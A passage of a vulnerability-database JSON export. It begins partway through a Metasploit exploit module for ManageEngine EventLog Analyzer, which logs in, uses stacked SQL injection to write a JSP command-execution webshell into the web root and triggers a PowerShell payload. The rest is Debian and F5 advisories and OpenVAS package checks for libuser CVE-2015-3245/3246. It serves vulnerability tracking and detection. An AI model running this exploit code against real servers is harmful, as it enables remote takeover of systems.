&& res.code == 200\n fail_with(Failure::Unknown, \"#{peer} - Failed executing SQL query!\")\n end\n\n res\n end\n\n\n def generate_jsp_payload(cmd)\n\n decoder = rand_text_alpha(4 + rand(32 - 4))\n decoded_bytes = rand_text_alpha(4 + rand(32 - 4))\n cmd_array = rand_text_alpha(4 + rand(32 - 4))\n jsp_code = '<%'\n jsp_code << \"sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\\n\"\n jsp_code << \"byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\\\"#{Rex::Text.encode_base64(cmd)}\\\");\\n\"\n jsp_code << \"String [] #{cmd_array} = new String[3];\\n\"\n jsp_code << \"#{cmd_array}[0] = \\\"cmd.exe\\\";\\n\"\n jsp_code << \"#{cmd_array}[1] = \\\"/c\\\";\\n\"\n jsp_code << \"#{cmd_array}[2] = new String(#{decoded_bytes}, \\\"UTF-8\\\");\\n\"\n jsp_code << \"Runtime.getRuntime().exec(#{cmd_array});\\n\"\n jsp_code << '%>'\n\n jsp_code\n end\n\n\n def exploit\n\n print_status(\"Retrieving JSESSION ID\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'event', 'index3.do'),\n })\n\n if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\\w+);/\n jsessionid = $1\n print_status(\"JSESSION ID Retrieved [ #{jsessionid} ]\")\n else\n fail_with(Failure::Unknown, \"#{peer} - Unable to retrieve JSESSION ID!\")\n end\n\n print_status(\"Access login page\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, 'event', \"j_security_check;jsessionid=#{jsessionid}\"),\n 'vars_post' => {\n 'forChecking' => 'null',\n 'j_username' => datastore['USERNAME'],\n 'j_password' => datastore['PASSWORD'],\n 'domains' => \"Local Authentication\\r\\n\",\n 'loginButton' => 'Login',\n 'optionValue' => 'hide'\n }\n })\n\n if res && res.code == 302\n redirect = URI(res.headers['Location'])\n print_status(\"Location is [ #{redirect} ]\")\n else\n fail_with(Failure::Unknown, \"#{peer} - Access to login page failed!\")\n end\n\n\n # Follow redirection process\n print_status(\"Following redirection\")\n res = send_request_cgi({\n 'uri' => \"#{redirect}\",\n 'method' => 'GET'\n })\n\n if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/\n cookies = res.get_cookies\n print_status(\"Logged in, new cookies retrieved [#{cookies}]\")\n else\n fail_with(Failure::Unknown, \"#{peer} - Redirect failed, unable to login with provided credentials!\")\n end\n\n\n jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.jsp'\n\n cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\n jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\\n/, '')\n\n\n print_status(\"Executing SQL queries\")\n\n # Remove large object in database, just in case it exists from previous exploit attempts\n sql = 'SELECT lo_unlink(-1)'\n result = sql_query(cookies, sql)\n\n # Create large object \"-1\". We use \"-1\" so we will not accidently overwrite large objects in use by other tasks.\n sql = 'SELECT lo_create(-1)'\n result = sql_query(cookies, sql)\n if result.body =~ /menuItemRow\\\">([0-9]+)/\n loid = $1\n else\n fail_with(Failure::Unknown, \"#{peer} - Postgres Large Object ID not found!\")\n end\n\n select_random = rand_text_numeric(2 + rand(6 - 2))\n # Insert JSP payload into the pg_largeobject table. We have to use \"SELECT\" first to to bypass OpManager's checks for queries starting with INSERT/UPDATE/DELETE, etc.\n sql = \"SELECT #{select_random};INSERT INTO/**/pg_largeobject/**/(loid,pageno,data)/**/VALUES(#{loid}, 0, DECODE('#{jsp_payload}', 'base64'));--\"\n\n\n result = sql_query(cookies, sql)\n\n # Export our large object id data into a WAR file\n sql = \"SELECT lo_export(#{loid}, '..//..//webapps//event/#{jsp_name}');\"\n\n sql_query(cookies, sql)\n\n # Remove our large object in the database\n sql = 'SELECT lo_unlink(-1)'\n result = sql_query(cookies, sql)\n\n register_file_for_cleanup(\"..\\\\webapps\\\\event\\\\#{jsp_name}\")\n\n print_status(\"Executing JSP payload\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, jsp_name),\n })\n\n # If the server returns 200 we assume we uploaded and executed the payload file successfully\n unless res && res.code == 200\n print_status(\"#{res.code}\\n#{res.body}\")\n fail_with(Failure::Unknown, \"#{peer} - Payload not executed, aborting!\")\n end\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb"}], "debian": [{"lastseen": "2019-10-24T22:40:36", "bulletinFamily": "unix", "description": "Package : libuser\nVersion : 1:0.56.9.dfsg.1-1.2+deb7u1\nCVE ID : CVE-2015-3245 CVE-2015-3246\nDebian Bug : 793465\n\nTwo security vulnerabilities were discovered in libuser, a library\nthat implements a standardized interface for manipulating and\nadministering user and group accounts, that could lead to a denial of\nservice or privilege escalation by local users.\n\nCVE-2015-3245\n Incomplete blacklist vulnerability in the chfn function in libuser\n before 0.56.13-8 and 0.60 before 0.60-7, as used in the userhelper\n program in the usermode package, allows local users to cause a\n denial of service (/etc/passwd corruption) via a newline character\n in the GECOS field.\n\nCVE-2015-3246\n libuser before 0.56.13-8 and 0.60 before 0.60-7, as used in the\n userhelper program in the usermode package, directly modifies\n /etc/passwd, which allows local users to cause a denial of service\n (inconsistent file state) by causing an error during the\n modification. NOTE: this issue can be combined with CVE-2015-3245\n to gain privileges.\n\nIn addition the usermode package, which depends on libuser, was\nrebuilt against the updated version.\n\nFor Debian 7 "Wheezy", these problems have been fixed in\n\nlibuser 1:0.56.9.dfsg.1-1.2+deb7u1\nusermode 1.109-1+deb7u2\n\nWe recommend that you upgrade your libuser and usermode packages.\n\n", "modified": "2016-05-12T18:07:40", "published": "2016-05-12T18:07:40", "id": "DEBIAN:DLA-468-1:4512C", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201605/msg00021.html", "title": "[SECURITY] [DLA 468-1] libuser security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:07", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 538035 (BIG-IP), ID 556431 (BIG-IQ), and ID 556434 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 12.1.0| Medium| libuser \nBIG-IP AAM| 12.0.0 \n11.4.0 - 11.6.1| 12.1.0| Medium| libuser \nBIG-IP AFM| 12.0.0 \n11.3.0 - 11.6.1| 12.1.0| Medium| libuser \nBIG-IP Analytics| 12.0.0 \n11.0.0 - 11.6.1| 12.1.0| Medium| libuser \nBIG-IP APM| 12.0.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| None| Medium| libuser \nBIG-IP ASM| 12.0.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 12.1.0| Medium| libuser \nBIG-IP DNS| 12.0.0| 12.1.0| Medium| libuser \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| libuser \nBIG-IP GTM| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| None| Medium| libuser \nBIG-IP Link Controller| 12.0.0 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 12.1.0| Medium| libuser \nBIG-IP PEM| 12.0.0 \n11.3.0 - 11.6.1| 12.1.0| Medium| libuser \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Medium| libuser \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| libuser \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| libuser \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Medium| libuser \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| libuser \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| libuser \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| libuser \nBIG-IQ ADC| 4.5.0| None| Medium| libuser \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| 4.4.0 CF9| Low| libuser\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the** Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability, you can limit administrative shell access to trusted users only.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-05-25T22:52:00", "published": "2015-12-02T21:16:00", "id": "F5:K05770600", "href": "https://support.f5.com/csp/article/K05770600", "title": "Linux libuser vulnerability CVE-2015-3246", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:09:37", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the** Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you can limit administrative shell access to trusted users only.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2016-05-25T00:00:00", "published": "2015-12-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/05/sol05770600.html", "id": "SOL05770600", "title": "SOL05770600 - Linux libuser vulnerability CVE-2015-3246", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:36:09", "bulletinFamily": "scanner", "description": "Mageia Linux Local Security Checks mgasa-2015-0278", "modified": "2018-09-28T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310130100", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130100", "title": "Mageia Linux Local Check: mgasa-2015-0278", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0278.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130100\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:42 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0278\");\n script_tag(name:\"insight\", value:\"Two flaws were found in the way the libuser library handled the /etc/passwd file. A local attacker could use an application compiled against libuser (for example, userhelper) to manipulate the /etc/passwd file, which could result in a denial of service or possibly allow the attacker to escalate their privileges to root (CVE-2015-3245, CVE-2015-3246).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0278.html\");\n script_cve_id(\"CVE-2015-3245\", \"CVE-2015-3246\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0278\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"libuser\", rpm:\"libuser~0.60~5.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-1483", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123073", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123073", "title": "Oracle Linux Local Check: ELSA-2015-1483", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1483.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123073\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:00 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1483\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1483 - libuser security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1483\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1483.html\");\n script_cve_id(\"CVE-2015-3245\", \"CVE-2015-3246\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"libuser\", rpm:\"libuser~0.60~7.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libuser-devel\", rpm:\"libuser-devel~0.60~7.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libuser-python\", rpm:\"libuser-python~0.60~7.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:53", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-1482", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123048", "title": "Oracle Linux Local Check: ELSA-2015-1482", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1482.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123048\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:58:42 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1482\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1482 - libuser security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1482\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1482.html\");\n script_cve_id(\"CVE-2015-3245\", \"CVE-2015-3246\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"libuser\", rpm:\"libuser~0.56.13~8.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libuser-devel\", rpm:\"libuser-devel~0.56.13~8.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libuser-python\", rpm:\"libuser-python~0.56.13~8.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:10", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-09-18T00:00:00", "id": "OPENVAS:1361412562310850683", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850683", "title": "SuSE Update for libuser openSUSE-SU-2015:1332-1 (libuser)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_1332_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for libuser openSUSE-SU-2015:1332-1 (libuser)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850683\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 10:39:24 +0200 (Fri, 18 Sep 2015)\");\n script_cve_id(\"CVE-2015-3246\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for libuser openSUSE-SU-2015:1332-1 (libuser)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libuser'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"libuser was updated to fix on security issue.\n\n The following vulnerability was fixed:\n\n * CVE-2015-3246: local root exploit through passwd file handling\n (boo#937533)\");\n script_tag(name:\"affected\", value:\"libuser on openSUSE 13.2\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:1332_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libuser\", rpm:\"libuser~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-debuginfo\", rpm:\"libuser-debuginfo~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-debugsource\", rpm:\"libuser-debugsource~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-devel\", rpm:\"libuser-devel~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-python\", rpm:\"libuser-python~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-python-debuginfo\", rpm:\"libuser-python-debuginfo~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser1\", rpm:\"libuser1~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser1-debuginfo\", rpm:\"libuser1-debuginfo~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libuser-lang\", rpm:\"libuser-lang~0.60~3.3.1\", rls:\"openSUSE13.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120278", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120278", "title": "Amazon Linux Local Check: ALAS-2015-572", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-572.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120278\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:22:26 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2015-572\");\n script_tag(name:\"insight\", value:\"It was found that libuser, as used in the chfn userhelper functionality, does not properly filter out newline characters, which allows an authenticated local attacker to corrupt the /etc/passwd file and cause denial-of-service against the system. (CVE-2015-3245 )A flaw was found in the way the libuser library handled the /etc/passwd file. A local attacker could use an application compiled against libuser (for example, userhelper) to manipulate the /etc/passwd file, which could result in a denial of service or possibly allow the attacker to escalate their privileges to root. (CVE-2015-3246 )\");\n script_tag(name:\"solution\", value:\"Run yum update usermode libuser to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-572.html\");\n script_cve_id(\"CVE-2015-3245\", \"CVE-2015-3246\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n 